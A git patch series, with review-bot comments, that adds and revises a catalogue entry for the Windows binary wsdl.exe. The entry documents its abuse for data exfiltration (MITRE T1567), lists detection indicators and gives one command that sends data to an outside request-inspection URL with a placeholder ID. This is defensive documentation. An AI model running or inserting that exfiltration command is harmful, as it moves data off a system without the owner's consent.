From 12165e0db019d320fc5f0fedea23a09e24e34122 Mon Sep 17 00:00:00 2001 From: teixeira0xfffff <50772593+teixeira0xfffff@users.noreply.github.com> Date: Sat, 15 Jul 2023 09:36:30 -0300 Subject: [PATCH 1/4] Create Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 yml/OtherMSBinaries/Wsdl.yml diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml new file mode 100644 index 00000000..bf5b89cb --- /dev/null +++ b/yml/OtherMSBinaries/Wsdl.yml 
@@ -0,0 +1,31 @@ +--- +Name: wsdl.exe +Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. +Author: 'Ialle Teixeira' +Created: 2022-03-28 +Commands: + - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe +Code_Sample: + - Code: +Detection: + - IOC: wsdl.exe storing data into alternate data streams. + - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. + - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" +Resources: + - Link: https://docs.microsoft.com/en-us/windows/win32/wsw/portal + - Link: https://en.wikipedia.org/wiki/Web_Services_Description_Language + - Link: https://social.msdn.microsoft.com/Forums/pt-BR/e15ce975-49c4-4aae-9b26-d66dc34ea122/como-utilizar-wsdlexe?forum=aspnetpt + - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language +Acknowledgement: + - Person: Ialle Teixeira + Handle: 'in@isdebuggerpresent' +--- From 58aa8038aaffee904ce3c6b58056dd04751a18c1 Mon Sep 17 00:00:00 2001 
From: teixeira0xfffff <50772593+teixeira0xfffff@users.noreply.github.com> Date: Sat, 15 Jul 2023 09:40:58 -0300 Subject: [PATCH 2/4] Update Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index bf5b89cb..b144a4a5 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: 'in@isdebuggerpresent' ---- From 5e44b04b4187a52a9b6629adce26abc359665f25 Mon Sep 17 00:00:00 2001 From: Wietze Date: Sat, 5 Aug 2023 18:47:18 +0100 Subject: [PATCH 3/4] Update Wsdl.yml --- yml/OtherMSBinaries/Wsdl.yml | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index b144a4a5..fa5f2388 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml 
@@ -1,22 +1,19 @@ --- Name: wsdl.exe -Description: The Web Services Description Language(WSDL) is an XML-based interface description language that is used for describing the functionality offered by a web service. The acronym is also used for any specific WSDL description of a web service (also referred to as a WSDL file), which provides a machine-readable description of how the service can be called, what parameters it expects, and what data structures it returns. Therefore, its purpose is roughly similar to that of a type signature in a programming language. -Author: 'Ialle Teixeira' +Description: .NET Frameworks WebService install and administration tool +Author: Ialle Teixeira Created: 2022-03-28 Commands: - Command: wsdl.exe /server https://requestinspector.com/insp/inspect/XXXXXXXXXXXXXXX - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file + Description: "Exfiltrate data via a HTTP web request's URL." + Usecase: Exfiltrate data Category: Upload Privileges: User MitreID: T1567 - OperatingSystem: Windows 10 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe -Code_Sample: - - Code: -Detection: - - IOC: wsdl.exe storing data into alternate data streams. +Detection: - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)" @@ -27,4 +24,3 @@ Resources: - Link: https://pt.stackoverflow.com/questions/29116/o-que-%C3%A9-wsdl-web-services-description-language Acknowledgement: - Person: Ialle Teixeira - Handle: 'in@isdebuggerpresent' From a747e26c879de60825c0fb873b9498ede868496f Mon Sep 17 00:00:00 2001 
From: Wietze Date: Sat, 5 Aug 2023 18:49:28 +0100 Subject: [PATCH 4/4] Removing trailing spaces --- yml/OtherMSBinaries/Wsdl.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Wsdl.yml b/yml/OtherMSBinaries/Wsdl.yml index fa5f2388..b377e907 100644 --- a/yml/OtherMSBinaries/Wsdl.yml +++ b/yml/OtherMSBinaries/Wsdl.yml @@ -1,6 +1,6 @@ --- Name: wsdl.exe -Description: .NET Frameworks WebService install and administration tool +Description: .NET Frameworks WebService install and administration tool Author: Ialle Teixeira Created: 2022-03-28 Commands: @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wsdl.exe -Detection: +Detection: - IOC: Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching wsdl.exe file. - IOC: User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 4.0.30319.42000)"
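
Review bot: in [PATCH 1/4], the Detection block of the new Wsdl.yml opens with `IOC: wsdl.exe storing data into alternate data streams.`, which does not match the entry's only command: that command is categorised `Upload` with `MitreID: T1567`, and nothing else in the entry refers to alternate data streams. Drop that IOC or add the command it belongs to. The second entry, `Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS.`, names a control rather than something observable; wording such as "wsdl.exe making outbound connections to non-RFC1918 addresses" would read as an indicator. Also in this hunk: `Code_Sample:` carries an empty `- Code:` item, the `Description` explains the WSDL language rather than the wsdl.exe binary, and `Created: 2022-03-28` is more than a year earlier than the commit date of 15 Jul 2023, so confirm which date is intended.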
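
Review bot: in [PATCH 3/4], first hunk (`@@ -1,22 +1,19 @@`), the Detection list is only trimmed and not brought in line with the rewritten command description. The description now says the data leaves in `a HTTP web request's URL`, yet no IOC covers the request URL itself, and the retained `Preventing/Detecting wsdl.exe with non-RFC1918 addresses by Network IPS/IDS.` still describes a control rather than an observable. Reword that line as an indicator and consider adding one for proxy or web-gateway logs in which the listed user agent appears with unusually long or data-bearing URLs. Minor wording: "a HTTP" should be "an HTTP", and the new `Description` no longer mentions WSDL at all, although the file's `Resources` links are about WSDL.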
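
Review bot: in [PATCH 4/4], both hunks only strip trailing whitespace from the `Description:` and `Detection:` lines, and both of those lines were introduced as `+` lines in [PATCH 3/4]; squash this commit into 3/4 so the series never adds the whitespace in the first place. A YAML lint step with a trailing-space rule, run before review, would catch this class of change automatically.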